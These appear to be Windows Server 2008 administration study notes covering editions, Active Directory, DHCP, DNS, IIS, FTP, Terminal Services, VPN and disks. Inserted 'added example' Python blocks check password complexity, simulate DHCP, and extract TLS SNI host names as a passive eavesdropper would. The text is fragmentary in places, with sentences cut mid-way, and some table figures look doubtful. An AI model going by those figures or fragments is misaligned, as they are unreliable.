System & Network Administration

As part of helping people drive business success, Microsoft is looking to help them manage complexity and achieve agility, protect information and control access, advance the business with IT solutions, and amplify their impact. By offering a productive platform for powering application networks, Web services and virtualization with Windows Server 2008, Microsoft helps you improve service levels at a lower cost, enables you to build and operate a flexible platform to meet changing business demands, and provides you with capabilities to secure the IT platform on which your organization relies. The better we enable your people to be productive and resourceful, the more we can help you and the individuals in your organization drive business success today and into the future.

Figure 1.1

IT infrastructure is a strategic asset and the critical foundation upon which software can deliver the services and user applications that a business needs in order to operate effectively and succeed. Windows Server 2008 enables greater business success by providing a platform that supports mission-critical solutions and applications, making them available to your organization when it needs them. Windows Server 2008 is the platform on which you can build your business.

Windows Server 2008, built with web and virtualization technologies, enables you to increase the reliability and flexibility of your server infrastructure. New virtualization tools, web resources, and security enhancements help you save time, reduce costs, and provide a platform for a dynamic and optimized datacenter. Powerful new tools like IIS 7, Windows Server Manager, and Windows PowerShell give you more control over your servers and streamline web, configuration, and management tasks.
Advanced security and reliability enhancements like Network Access Protection and the Read-Only Domain Controller harden the operating system and protect your server environment to ensure you have a solid foundation on which to build your business. The following figure outlines the technology investments of Windows Server 2008:
Figure 1.2
Windows Server 2008 Datacenter without Hyper-V delivers an enterprise-class platform for deploying business-critical applications and large-scale virtualization on small and large servers. It improves availability with clustering and dynamic hardware partitioning capabilities, reduces infrastructure costs by consolidating applications with unlimited virtualization licensing rights, and scales from 2 to 64 processors. Windows Server 2008 Datacenter without Hyper-V provides a foundation on which to build enterprise-class virtualization and scale-up solutions; this edition does not include the Hyper-V server role.
Table 1.1 (edition overview)

Table 1.2 Key technology investments by edition: Hyper-V; Network Access Protection; AD Rights Management Services; Terminal Services Gateway and RemoteApp; Server Manager

Table 1.3 Server roles by edition (legend: Full, Partial/Limited, Not Available)
Roles listed: Web Services (IIS); Application Server; Hyper-V*; Print Services; Active Directory Domain Services; Active Directory Lightweight Directory Services; Active Directory Rights Management Services; DHCP Server; DNS Server; Fax Server; UDDI Services; Windows Deployment Services; Active Directory Certificate Services; File Services; Network Policy and Access Services; Terminal Services; Active Directory Federation Services

Notes to Tables 1.3 and 1.4 (limits that apply in the smaller editions):
- * For customers that do not need virtualization, Windows Server 2008 Standard, Enterprise and Datacenter editions are available without Windows Server 2008 Hyper-V technology.
- Active Directory Certificate Services: limited to creating Certificate Authorities; no other AD CS features (NDES, Online Responder Service). See the AD CS role documentation on TechNet for more information.
- File Services: limited to 1 standalone DFS root.
- Network Policy and Access Services: limited to 250 RRAS connections, 50 IAS connections and 2 IAS Server Groups.
- Terminal Services: limited to 250 Terminal Services Gateway connections.

Table 1.4 Server roles available on a Server Core installation: Web Services (IIS); Hyper-V*; Active Directory Domain Services; Active Directory Lightweight Directory Services; DHCP Server; DNS Server; Print Services; File Services
Table 1.5 Features by edition (legend: Available, Not Available)
Features listed: Desktop Experience; Windows Clustering; Windows Server Backup; Windows Network Load Balancing (WNLB); Simple TCP/IP Services; SMTP; Subsystem for UNIX-based Applications (SUA); Telnet Client; Telnet Server; Microsoft Message Queuing (MSMQ); RPC over HTTP Proxy; Windows Internet Naming Service (WINS); Wireless Client; Windows System Resource Manager (WSRM); Windows Foundation Components for WinFX; BITS Server Extensions; iSNS Server Service; BitLocker Drive Encryption; Multipath IO; Removable Storage Management; TFTP; SNMP; Server Admin Pack; RDC; Peer to Peer Name Resolution Protocol; Recovery Disk; Windows PowerShell
Table 1.6 Edition limits (legend: Available, Not Available; Web Server edition has the same socket and memory limits as Standard)

                                     Standard        Enterprise    Datacenter
x86 sockets                          4               8             32
x64 sockets                          4               8             64
x86 RAM                              4 GB            64 GB         64 GB
x64 RAM                              32 GB           2 TB          2 TB
Failover clustering (nodes)          Not available   16            16
Network Access Connections (RRAS)    250             Unlimited     Unlimited
Network Access Connections (IAS)     50              Unlimited     Unlimited
Terminal Services Gateway            250             Unlimited     Unlimited
Virtual image use rights             Host + 1 VM     Host + 4 VM   Unlimited
Remote Desktop (admin) connections   2               2             2

The table also covers IA64 sockets and IA64 RAM, hot add and hot replace memory, hot add and hot replace processors, fault tolerant memory sync, and cross-file replication (DFS-R).
Table 1.7 Licensing channels: Retail (FPP); Evaluation (EVAL, not for sale); Volume Licensing (VL); Special Programs

Table 1.8 Available languages (legend: Available, Not Available): English; German; Japanese; French; Spanish; Chinese Simplified; Chinese Traditional; Chinese Hong Kong; Italian; Russian; Korean; Brazilian Portuguese; Dutch; Swedish; Portuguese; Polish; Turkish; Czech; Hungarian
Any computer on the network can join an existing workgroup as long as the same workgroup name is configured on each member. Resources on a workgroup server are available to a user only when the user supplies credentials that the server itself can authenticate, because each workgroup computer keeps its own local account database. Although not managed through Active Directory, workgroup servers contain a standard set of local management tools for administering the security policies that individual users or groups must satisfy to gain authenticated access to resources located on the workgroup server itself. Any workgroup server running Windows Server (Windows 2000 Server or later) can be promoted to the role of a domain controller if a network administrator changes the network model from a workgroup to a domain-based topology.

Each domain must have at least one domain controller (the NT-style PDC survives in Active Directory only as the PDC emulator role, held by one DC per domain) for centralized user account management through the directory. Domains in a forest share a hierarchical directory database, security policies, and trust relationships with their sub-domains. A domain controller provides access to the centralized user account and group policies maintained by the domain administrator, predominantly from the directory itself. Because domains use a hierarchy of parent-child relationships within a forest, AD domains are generally recommended and most effectively used by larger organizations where collaborative computing between numerous workgroups must span multiple departmental servers with common sets of related security policies in place.
2. Active Directory
A structure supported by Windows Server 2003 and 2008 that lets any object on a network be tracked and located. Active Directory is the directory service used in Windows Server 2003 and 2008 and provides the foundation for Windows Server distributed networks.
A directory service provides the methods for storing directory data and making this data available to network users and administrators. For example, Active Directory stores information about user accounts, such as names, phone numbers, and so on, and enables other authorized users on the same network to access this information.
The AD, or Active Directory, keeps its data in the NTDS.dit database (see Table 2.1) and exposes it through LDAP (Lightweight Directory Access Protocol), the standard directory access protocol, which makes the information contained within the AD easily available to other applications across different platforms.
Figure 2.1 Structure of Active Directory: logical structure (domain, tree, forest) and physical structure (domain controllers, sites)
2.1 Domain
A domain is a logical, secure administrative boundary. Creating the initial domain controller in a network also creates the domain; a domain cannot exist without at least one domain controller. Each domain is identified by a DNS domain name.
2.2 Trees
A tree is a group of domains that share a contiguous namespace. In other words, a tree consists of a parent domain plus one or more sets of child domains whose names reflect that of the parent. For example, a parent domain named examcram.com can include child domains with names such as products.examcram.com, sales.examcram.com, and manufacturing.examcram.com. Furthermore, the tree structure can contain grandchild domains such as america.sales.examcram.com or europe.sales.examcram.com, and so on, as shown. All domains in a tree are linked with two-way, transitive trust relationships; in other words, accounts in any one domain can be granted access to resources in another domain and vice versa (the trust makes cross-domain authentication possible; permissions are still assigned on the resource itself).
Whenever a password is set for a user, the domain controller checks the new password against the password policy in effect (minimum length, complexity, history, and so on); by default this is the Default Domain Policy. To allow a password that does not meet the default settings, the policy itself must be changed. Windows Server 2008 also introduces fine-grained password policies (password settings objects), which apply different rules to specific users or groups without changing the domain-wide default.
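The following is an added example, not code from the original document: a small checker that emulates the Windows "Password must meet complexity requirements" rule together with the domain's minimum-length setting, so that an administrator can see why a candidate password would be rejected before the domain controller rejects it. The default minimum length of 7 and the user name and display name used in the demo are assumptions for the example.

```python
# Added example (not from the original document): emulates the Windows
# "Password must meet complexity requirements" policy plus the minimum-length
# setting. The default minimum length of 7 mirrors the Windows Server 2008
# Default Domain Policy; the sample user below is constructed for the demo.
import re

DEFAULT_MIN_LENGTH = 7       # Default Domain Policy value on Windows Server 2008 (assumed default here)
COMPLEXITY_MIN_LENGTH = 6    # floor enforced by the complexity rule itself
MIN_CATEGORIES = 3           # password must use 3 of the 5 character classes


def display_name_tokens(display_name: str) -> list[str]:
    """Windows splits the display name on commas, periods, dashes, underscores,
    spaces, pound signs and tabs, and only checks tokens of 3+ characters."""
    return [t for t in re.split(r"[,.\-_ #\t]+", display_name) if len(t) >= 3]


def character_categories(password: str) -> set[str]:
    """Classify each character into the five classes the policy counts."""
    cats: set[str] = set()
    for ch in password:
        if ch.isdigit():
            cats.add("digit")
        elif ch.isupper():
            cats.add("upper")
        elif ch.islower():
            cats.add("lower")
        elif ch.isalpha():       # alphabetic but neither upper nor lower (e.g. CJK scripts)
            cats.add("other-alpha")
        else:
            cats.add("special")  # punctuation, symbols, whitespace
    return cats


def check_password(password: str, sam_account_name: str = "", display_name: str = "",
                   min_length: int = DEFAULT_MIN_LENGTH, complexity: bool = True) -> list[str]:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems: list[str] = []
    if len(password) < min_length:
        problems.append(f"shorter than the minimum length of {min_length}")
    if not complexity:
        return problems
    if len(password) < COMPLEXITY_MIN_LENGTH:
        problems.append(f"complexity rule requires at least {COMPLEXITY_MIN_LENGTH} characters")
    pw = password.lower()
    # The whole sAMAccountName is checked (case-insensitively), but only if it is 3+ characters.
    if len(sam_account_name) >= 3 and sam_account_name.lower() in pw:
        problems.append("contains the account name")
    for token in display_name_tokens(display_name):
        if token.lower() in pw:
            problems.append(f"contains part of the display name ({token})")
    cats = character_categories(password)
    if len(cats) < MIN_CATEGORIES:
        problems.append(f"uses only {len(cats)} of the 5 character categories (need {MIN_CATEGORIES})")
    return problems


if __name__ == "__main__":
    # Constructed sample user 'jdoe' / 'John Doe' and candidate passwords.
    for candidate in ("Passw0rd!", "jdoe1234", "Doe-2024x!", "password", "Abc1!", "Abcdef1"):
        print(f"{candidate!r:14} -> {check_password(candidate, 'jdoe', 'John Doe') or 'OK'}")
```

The checker reports every violated rule rather than stopping at the first one, which is what you want when explaining a rejection to a user; note that the history rule ("remember N passwords") cannot be checked without the stored hashes, so it is deliberately out of scope.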
2.5 Forest
- Multiple domain trees within a single forest do not form a contiguous namespace.
- Although trees in a forest do not share a namespace, a forest has a single root domain, called the forest root domain.
- The forest root domain is the first domain created in the forest. Two forest-wide predefined groups reside in the forest root domain:
  - Enterprise Admins
  - Schema Admins
Figure 2.2

Table 2.1 Differences between versions of Windows Server directory services

                          NT (NTDS)    2000 (ADS)    2003 (ADS)    2008 (AD DS)
Database                  SAM          NTDS.dit      NTDS.dit      NTDS.dit
Size of database          40 MB        16 MB         12 MB         12 MB
Authentication protocol   NTLM         Kerberos      Kerberos      Kerberos
Forest                    N/A          Yes           Yes           Yes
Server roles              PDC, BDC     DC, ADC       DC, ADC       DC, ADC

(ADC: additional domain controller.)
2.8 Sites
- Sites represent distinct physical locations, typically separate geographical areas joined by slower WAN links. In Active Directory a site is defined as a set of well-connected IP subnets, and sites are used to control replication traffic and to direct clients to nearby domain controllers.
2.9 Domains
If policies are defined at the domain level, they are applied by default to every object in the domain, including the administrator accounts. These policies are inherited by every OU in the domain unless inheritance is blocked at the OU.
Figure 2.3
- Managing GPOs
- Managing GPO links
- Performing tasks on GPOs
- Creating GPOs
- Creating and editing WMI filters
Table 2.2
Trusts are connections between either domains or forests that allow objects within Active Directory to access, modify, and use resources across the trust. In general, trusts exist on two levels: forest and domain.
Figure 2.4
2.12.2.2 Shortcut trusts: - A shortcut trust is a Kerberos trust created directly between two domains in the same forest, so that authentication referrals go straight from one domain to the other instead of walking up and down their trees through the forest root. Shortcut trusts are transitive and can be one-way or two-way. It is quite a useful trick, and it can save a lot of time on cross-domain logons.
Figure 2.5
2.12.2.3 Realm trusts: - Realm trusts give users in a non-Windows Kerberos realm (for example, an MIT Kerberos realm on UNIX) the ability to authenticate to and have a relationship with a Windows domain. This means the users on another operating system can have access to your files and resources. A realm trust can be created one-way or two-way, and either transitive or non-transitive.
Figure 2.6
3. SERVERS
When a client is turned on, it has a name but does not have an IP address. It also does not know the IP address of the DHCP server, so it must broadcast its request, and the DHCP server must broadcast the answer. A total of four packets are exchanged between the client and server. Many people remember the four packets by using the acronym DORA. The four packets exchanged between a DHCP client and a DHCP server are as follows:
DHCP discover (the D in DORA): The DHCP discover packet is broadcast, looking for any server running the DHCP service.
DHCP offer (the O in DORA): When a DHCP server receives a DHCP discover, it responds by broadcasting an offer, which includes a lease length and specific TCP/IP options. Options include an IP address, subnet mask, and any other TCP/IP options that have been configured on the DHCP server. It is possible for more than one DHCP server to receive the request and respond with an offer.
DHCP request (the R in DORA): The DHCP client responds to the first DHCP offer with a DHCP request, which is also broadcast and names the server whose offer it accepted. In essence, the DHCP client is asking to confirm the lease. If a DHCP server's offer is not requested (for example, the second DHCP server that sent an offer), the DHCP offer times out and the IP address becomes available to give to another client.
DHCP acknowledge (the A in DORA): After receiving the DHCP request, the DHCP server responds with a DHCP acknowledge. At this point, the DHCP server confirms the IP address is allocated and not available to give to other clients, and the client begins to
Note that nothing in this exchange is authenticated: any host on the broadcast domain can answer a discover with its own offer (a rogue DHCP server) and hand out a malicious default gateway or DNS server. A Windows DHCP server refuses to serve leases until it has been authorized in Active Directory, but that only stops unauthorized Windows DHCP servers; other rogue servers have to be blocked on the switch (DHCP snooping).
Figure 3.1
3.2 Scopes
DHCP is configured with scopes to identify the range of available IP addresses to give to computers on a subnet. A scope usually relates directly to a subnet, though a subnet can contain more than one scope. DHCP uses UDP port 67 on the server and UDP port 68 on the client.
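The following is an added example, not code from the original document: the DORA exchange of Section 3.1 built, parsed and handled as real RFC 2131 packets in pure Python, with two DHCP servers so that the "offer that was not taken" path is visible. The server addresses, address pools, client MAC, transaction ID and lease time are all constructed for the demo; there is no network I/O, the packets are passed between the functions as byte strings.

```python
# Added example (not from the original document): the DORA exchange as RFC 2131
# packets built, parsed and handled in pure Python, with two DHCP servers so the
# "offer that was not taken" path is visible. Pool addresses, MAC, xid and lease
# time are constructed for the demo.
import struct
from socket import inet_aton, inet_ntoa

MAGIC = b"\x63\x82\x53\x63"                  # DHCP magic cookie after the BOOTP header
BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER, REQUEST, ACK, NAK = 1, 2, 3, 5, 6
OPT_MASK, OPT_ROUTER, OPT_REQ_IP, OPT_LEASE = 1, 3, 50, 51
OPT_TYPE, OPT_SERVER_ID, OPT_END = 53, 54, 255
HDR = "!BBBBIHH4s4s4s4s16s64s128s"           # fixed 236-byte BOOTP header
SERVER_PORT, CLIENT_PORT = 67, 68            # UDP ports from Section 3.2


def build(op, xid, mac, yiaddr="0.0.0.0", options=()):
    """Serialize a DHCP message. flags=0x8000 asks for broadcast replies (client has no IP yet)."""
    hdr = struct.pack(HDR, op, 1, 6, 0, xid, 0, 0x8000,
                      inet_aton("0.0.0.0"), inet_aton(yiaddr), b"\0" * 4, b"\0" * 4,
                      mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    body = b"".join(bytes([code, len(val)]) + val for code, val in options)
    return hdr + MAGIC + body + bytes([OPT_END])


def parse(pkt):
    """Parse the header and the TLV option list; skips PAD (0) and stops at END (255)."""
    f = struct.unpack(HDR, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == 0:
            i += 1
            continue
        code, ln = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + ln]
        i += 2 + ln
    return {"op": f[0], "xid": f[4], "yiaddr": inet_ntoa(f[8]), "mac": f[11][:f[2]], "opts": opts}


class DhcpServer:
    def __init__(self, ip, pool, mask="255.255.255.0", lease=3600):
        self.ip, self.free, self.mask, self.lease = ip, list(pool), mask, lease
        self.offered, self.leased = {}, {}       # mac -> ip

    def _reply(self, kind, msg, ip):
        opts = [(OPT_TYPE, bytes([kind])), (OPT_SERVER_ID, inet_aton(self.ip))]
        if kind != NAK:
            opts += [(OPT_MASK, inet_aton(self.mask)), (OPT_ROUTER, inet_aton(self.ip)),
                     (OPT_LEASE, struct.pack("!I", self.lease))]
        return build(BOOTREPLY, msg["xid"], msg["mac"], ip, opts)

    def handle(self, pkt):
        msg = parse(pkt)
        kind, mac = msg["opts"][OPT_TYPE][0], msg["mac"]
        if kind == DISCOVER:                     # O: reserve an address, but do not commit it yet
            if not self.free:
                return None
            ip = self.offered[mac] = self.free.pop(0)
            return self._reply(OFFER, msg, ip)
        if kind == REQUEST:
            if msg["opts"][OPT_SERVER_ID] != inet_aton(self.ip):
                # The client accepted another server's offer: withdraw ours (the "offer times out" case).
                if mac in self.offered:
                    self.free.append(self.offered.pop(mac))
                return None
            wanted = inet_ntoa(msg["opts"][OPT_REQ_IP])
            if self.offered.get(mac) != wanted:  # asking for an address we never offered
                return self._reply(NAK, msg, "0.0.0.0")
            self.leased[mac] = self.offered.pop(mac)   # A: commit the lease
            return self._reply(ACK, msg, wanted)
        return None


def run_dora(servers, mac=b"\x00\x11\x22\x33\x44\x55", xid=0x3903F326):
    """Client side of DORA: broadcast DISCOVER, take the first OFFER, broadcast REQUEST, expect ACK."""
    trace = ["DISCOVER"]
    discover = build(BOOTREQUEST, xid, mac, options=[(OPT_TYPE, bytes([DISCOVER]))])
    offers = [r for r in (s.handle(discover) for s in servers) if r]     # broadcast: every server sees it
    trace += ["OFFER"] * len(offers)
    chosen = parse(offers[0])
    request = build(BOOTREQUEST, xid, mac, options=[
        (OPT_TYPE, bytes([REQUEST])), (OPT_REQ_IP, inet_aton(chosen["yiaddr"])),
        (OPT_SERVER_ID, chosen["opts"][OPT_SERVER_ID])])                 # names the accepted server
    trace.append("REQUEST")
    replies = [r for r in (s.handle(request) for s in servers) if r]     # only the chosen server answers
    ack = parse(replies[0])
    trace.append("ACK" if ack["opts"][OPT_TYPE][0] == ACK else "NAK")
    return {"trace": trace, "ip": ack["yiaddr"], "mask": inet_ntoa(ack["opts"][OPT_MASK]),
            "lease": struct.unpack("!I", ack["opts"][OPT_LEASE])[0]}


if __name__ == "__main__":
    a = DhcpServer("192.168.1.1", ["192.168.1.10", "192.168.1.11"])   # constructed servers/pools
    b = DhcpServer("192.168.1.2", ["192.168.1.200"])
    print(run_dora([a, b]))                  # ACK from server a; server b withdraws its offer
    print("server b pool restored:", b.free)
```

Because the REQUEST is broadcast with the chosen server's identifier, every server learns the outcome; the server whose offer was not taken returns the address to its pool immediately here, whereas a real server would also let the offer expire on a timer.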
3.3.1 Zones
A DNS zone is group of resource records associated with a specific namespace. It includes mappings of names to IP addresses, IP addresses to names, names to services, and more. If a DNS server is responsible for maintaining records for a given namespace, it is considered authoritative for that zone.
3.3.2.2 Secondary zone: - A secondary zone is created on a different DNS server to provide load balancing and redundancy for the DNS server holding the primary zone. The secondary zone is a read-only copy of the zone data; it cannot be modified except through zone transfers from the primary.
3.3.2.3 Stub zone: - A stub zone is a copy of the key records of another zone. Its purpose is to identify the DNS servers that are authoritative for that zone. A stub zone does not contain all of the records in the zone, only those needed to reach the authoritative DNS servers: the start of authority (SOA) record, the name server (NS) records, and the host (A) records (glue) for those name servers.
3.3.2.4 Active Directory-integrated zones: - Both primary zones and stub zones can also be Active Directory-integrated (ADI) zones. An ADI zone is one that is stored in the Active Directory database rather than in a zone file. A significant benefit of ADI zones is that zone replication becomes part of Active Directory replication: whenever an object changes (a user, a computer, or in this case a DNS zone record), the replication process sends the change to the other domain controllers. Because the zone data travels over Active Directory replication, it is authenticated and encrypted, unlike a standard zone transfer. Additionally, because every DNS server hosting an ADI zone holds a writable (primary) copy, an ADI zone provides built-in fault tolerance: if a single DNS server fails, the other DNS servers continue to serve the zone and accept updates. Storing the zone in AD also enables secure dynamic update, so that only the authenticated computer that owns a record can modify it.
3.3.4.1 PTR: - The PTR record is contained within the reverse lookup zone. It provides the mapping from an IP address to a name. PTR records can be created automatically when the A or AAAA record is created with dynamic update.
3.3.4.2 SOA: - The start of authority (SOA) record provides key information about the zone (primary server, responsible contact, serial number, refresh and retry intervals) and is created when the zone is created.
3.3.4.3 SRV: - SRV records identify servers running specific services within the domain. DNS is required within an Active Directory Domain Services domain, and the SRV records (for example the _ldap and _kerberos records under _tcp) that clients use to locate domain controllers are a core reason why DNS is required.
3.3.4.4 NS: - The NS record identifies the DNS name servers for a zone. An NS record can be created within a zone by viewing the properties of the zone and selecting the Name Servers tab.
3.3.4.5 MX: - Mail exchanger (MX) records identify the mail servers for a domain. An MX record is sometimes referred to as a mail exchange record.
3.3.4.6 CNAME (alias): - A CNAME record allows a single server to respond to multiple names. DNS queries for any of the names (the A record's name or any of the CNAME names) resolve to the same IP address.
Figure 3.2
client can be any system (Microsoft or non-Microsoft) running a web browser such as Internet Explorer. A page is requested, IIS produces the HTML-formatted page, and the client receives the HTML page and displays it in the browser.
Figure 3.3
Figure 3.4
- On the Confirm Installation Selections page, review your choices, and click Install.
- When the installation completes, click Close.
malware into the connection. This is one reason why the EFF and the Tor Project started the development of HTTPS Everywhere, which is included in the Tor Browser Bundle. Note that when a client sends an HTTPS request, the entire HTTP request is encrypted, including the URL. However, the hostname and port are still visible to an eavesdropper: the destination IP address and port are in the TCP/IP headers, the hostname is sent in clear text in the Server Name Indication (SNI) extension of the TLS ClientHello (and was looked up in clear-text DNS just before), and with TLS 1.2 and earlier the server's certificate is also sent unencrypted. This means that an eavesdropper can see the sites you connect to, the amount of time you spend using a site, and the amount of information you upload or download on the particular site. [1] However, the HTTP request itself, including the URL path and query parameters, can only be decrypted by the destination site or by an interposing intermediary that terminates the HTTPS connection on behalf of the site. A site must be completely hosted over HTTPS, without having some of its contents loaded over HTTP, or the user will be vulnerable to some attacks and surveillance.
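The following is an added example, not code from the original document: it builds a minimal TLS 1.2 ClientHello for a constructed hostname and then parses it exactly the way a passive sniffer on the wire would, to show that the server name travels in clear text in the SNI extension while the HTTP path never appears before encryption starts. The cipher suite list, random bytes, hostname and destination IP are constructed for the demo.

```python
# Added example (not from the original document): build a TLS 1.2 ClientHello
# with a Server Name Indication extension and parse the host name back out of
# it as a passive eavesdropper would. Suites, hostname and IP are constructed.
import os
import struct

TLS12 = b"\x03\x03"
EXT_SNI = 0
SAMPLE_SUITES = [0xC02F, 0xC030, 0x009C]   # constructed list; any suites will do for the demo


def build_client_hello(server_name=None, suites=SAMPLE_SUITES):
    """Serialize a ClientHello record; server_name=None omits the SNI extension."""
    extensions = b""
    if server_name is not None:
        name = server_name.encode("idna")
        entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type 0 = host_name
        sni = struct.pack("!H", len(entry)) + entry                # ServerNameList
        extensions += struct.pack("!HH", EXT_SNI, len(sni)) + sni
    body = (TLS12 + os.urandom(32) + b"\x00"                       # version, random, empty session id
            + struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
            + b"\x01\x00"                                          # one compression method: null
            + struct.pack("!H", len(extensions)) + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body     # HandshakeType client_hello
    return b"\x16" + TLS12 + struct.pack("!H", len(handshake)) + handshake   # ContentType handshake


def extract_sni(record):
    """Walk a TLS record as a sniffer would and return the SNI host name, or None."""
    if record[0] != 0x16 or record[5] != 0x01:        # not a handshake record / not a ClientHello
        return None
    i = 9 + 2 + 32                                      # record + handshake headers, version, random
    i += 1 + record[i]                                  # session id
    i += 2 + struct.unpack("!H", record[i:i + 2])[0]    # cipher suites
    i += 1 + record[i]                                  # compression methods
    if i >= len(record):
        return None                                     # no extensions block at all
    ext_end = i + 2 + struct.unpack("!H", record[i:i + 2])[0]
    i += 2
    while i + 4 <= ext_end:
        ext_type, ext_len = struct.unpack("!HH", record[i:i + 4])
        data = record[i + 4:i + 4 + ext_len]
        if ext_type == EXT_SNI:
            j = 2                                       # skip ServerNameList length
            while j + 3 <= len(data):
                name_type = data[j]
                name_len = struct.unpack("!H", data[j + 1:j + 3])[0]
                if name_type == 0:
                    return data[j + 3:j + 3 + name_len].decode("idna")
                j += 3 + name_len
        i += 4 + ext_len
    return None


def eavesdropper_view(dst_ip, dst_port, first_client_record):
    """Everything a passive observer learns from the TCP header plus the first TLS record."""
    return {"ip": dst_ip, "port": dst_port, "sni": extract_sni(first_client_record)}


if __name__ == "__main__":
    hello = build_client_hello("www.example.com")
    print(eavesdropper_view("203.0.113.10", 443, hello))                   # constructed destination
    print(eavesdropper_view("203.0.113.10", 443, build_client_hello(None)))  # no SNI: only IP and port
```

Point the parser at the first client-to-server record of a real capture and it returns the same host name your packet analyzer shows; the path and query of the HTTP request only appear inside later application-data records, which are encrypted. Encrypted Client Hello (a TLS 1.3 extension) closes this leak, but it is not part of the TLS versions discussed on this page.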
File Transfer Protocol (FTP) is a TCP/IP protocol that enables a user to transfer files between local and remote host computers. You place your files in directories on your FTP server so that users can establish an FTP connection and transfer files with an FTP client or FTP-enabled web browser. When you install the FTP role service on Windows Server 2008, the IIS 6.0-based FTP service is installed to host the FTP sites; therefore, to manage the FTP sites, you open Internet Information Services (IIS) 6.0 Manager from Administrative Tools. After FTP is installed, there is already a Default FTP Site with C:\inetpub\ftproot as the FTP working folder. By default, you can read from the FTP site, but you need to enable Write if you wish the FTP site to be used to upload files. Keep in mind that plain FTP sends user names, passwords and file contents in clear text; use FTP over SSL (FTPS) or another protocol for anything other than anonymous downloads. The available isolation modes are:
3.6.1 Do Not Isolate Users: - This mode does not enable FTP user isolation and works similarly to earlier versions of IIS.
3.6.2 Isolate Users: - This mode authenticates users against local or domain accounts before they can access the home directories that match their user names. All user home directories are in a directory structure under a single FTP root directory, where each user is placed in and restricted to a home directory. Users are not permitted to navigate out of the home directory.
3.6.3 Isolate Users Using Active Directory: - This mode authenticates users against Active Directory and reads each user's FTP home directory from attributes of the user's account, searching only the configured container rather than the entire directory, which would require large amounts of processing time. Specific FTP server instances can be dedicated to each customer to ensure data integrity and isolation.
Terminal Services is a server role in Windows Server 2008. It provides users with access to either Windows-based programs or a full Windows desktop located on a server. The full feature set of TS is available only to clients running Windows Vista or Windows Server 2008, but Terminal Services also supports clients running Windows XP and Windows Server 2003.
Figure 3.5
Disconnect session: - If a session is disconnected, all of its programs continue to run on the server in the background, and the user can reconnect to the same session.
3.7.2.1 Logoff session: - If a session is logged off, all of its programs are closed, and a new session is established the next time the user connects.
3.7.2.2 Terminal Services Manager: - User terminal sessions can be monitored, and users can be forced to log off or disconnect. It lets you see all users and sessions on any server from one location.
Figure 3.6
When using Terminal Services (TS) to allow users to run remote desktop sessions or TS RemoteApp applications, you need a TS Client Access License (TS CAL) for each connection. Creating, tracking, and maintaining these licenses can be quite challenging. TS Licensing is an additional role service you can add after installing the Terminal Services role, for the management of TS licenses. You must have at least one TS Licensing server. Two types of TS CALs can be issued. When configuring CAL licensing, you must configure the terminal servers to use the same licensing mode as the TS Licensing server.
3.7.4.1 TS Per Device CAL: - The first time a computer or device connects, it is issued a temporary license by default. If the computer connects again, the license server is checked to determine whether there are any available TS CALs to issue. If so, the computer or device is issued a permanent CAL. Any user can connect to a terminal server using a computer that has been issued a TS Per Device CAL. Once all the available CALs are issued, computers or devices are denied access the second time they try to connect.
3.7.4.2 TS Per User CAL: - A TS Per User CAL gives a user the right to access a terminal server from any number of computers or devices. Unlike TS Per Device CALs, TS Per User CALs are not enforced by the licensing server; administrators still have a responsibility to track the licenses and ensure adequate licenses are purchased.
Figure 3.7
A VPN differs in how the client connects to the remote access server. Instead of connecting directly to the remote access server via a telephone line, the client tunnels through the Internet. Any time the client connects via a phone line, the Point-to-Point Protocol (PPP) is used. First, the client gains access to the Internet through a local Internet service provider (ISP). If it is dial-up, the client uses PPP to connect, but the client may equally have a broadband connection to the Internet. When planning for a VPN server, you will need to decide which tunneling protocol to use. The following tunneling protocols can be used with a Microsoft VPN server:
3.9.1 PPTP: - The Point-to-Point Tunneling Protocol (PPTP) is the oldest of the three. It is supported by Windows 2000 and newer operating systems and can be used over IP-based connections. Data is encrypted using Microsoft Point-to-Point Encryption (MPPE), providing data confidentiality. PPTP does not provide data integrity or machine-level authentication, and because its MPPE keys are derived from the MS-CHAPv2 user authentication, which can be broken offline from a captured handshake, PPTP should be treated as unsuitable for protecting sensitive traffic today.
3.9.2 L2TP: - The Layer 2 Tunneling Protocol (L2TP) is supported by clients running Windows 2000 or newer operating systems. L2TP is commonly used with IPsec, and you will often see it written as L2TP/IPsec. IPsec provides data confidentiality and integrity to L2TP. Machine-level authentication is achieved through a pre-shared key or computer certificates. One historical drawback of L2TP/IPsec was that IPsec could not pass through a Network Address Translation (NAT) device, so administrators often had to fall back to a PPTP solution that sacrificed security. IPsec NAT Traversal (NAT-T, which encapsulates ESP in UDP port 4500) removes this limitation on Windows Server 2008, provided the client, the server and the NAT device all support it.
3.9.3 SSTP: - The Secure Socket Tunneling Protocol (SSTP) is the newest tunneling protocol. It is supported only on clients running Windows Vista SP1 or newer operating systems. SSTP uses SSL/TLS to encrypt the data and provide data confidentiality. Further, it carries the tunnel inside HTTPS over TCP port 443, which passes through firewalls and proxies without requiring modifications, because port 443 is usually already open. Unlike L2TP/IPsec without NAT-T, SSTP passes through a NAT device. The TLS layer within SSTP also provides data integrity and server (machine-level) authentication through the server's certificate.
A Windows Server 2008 dynamic disk is a physical disk configuration that does not use partitions or logical drives, and the MBR partition table is not used to describe its volumes. Instead, the basic partition table is modified and any partition table entries from the MBR are added to the Logical Disk Manager (LDM) database that stores dynamic disk information at the end of each dynamic disk. Dynamic disks can be divided into as many as 2,000 separate volumes, but you should limit the number of volumes to 32 per dynamic disk to avoid slow boot times. Dynamic disks do not have the same limitations as basic disks; for example, you can extend a volume on a dynamic disk on the fly without requiring a reboot.

Dynamic disks are associated with disk groups, which are disks that are managed as a collection. All dynamic disks in a computer are members of the same disk group, and each disk in the group stores a replica of the same configuration data. This configuration data is stored in the 1 MB LDM region at the end of each dynamic disk. Dynamic disks support five types of volumes: simple, spanned, mirrored, striped, and RAID-5. You can extend a volume on a dynamic disk, and because a dynamic disk can hold far more volumes than a basic disk, you are not restricted to four primary partitions per disk as you are with basic MBR disks.

3.10.3 The five types of dynamic volumes are
3.10.3.1 Simple Volumes: A simple volume consists of disk space on a single physical disk. It can consist of a single area on a disk or multiple areas on the same disk that are linked together.
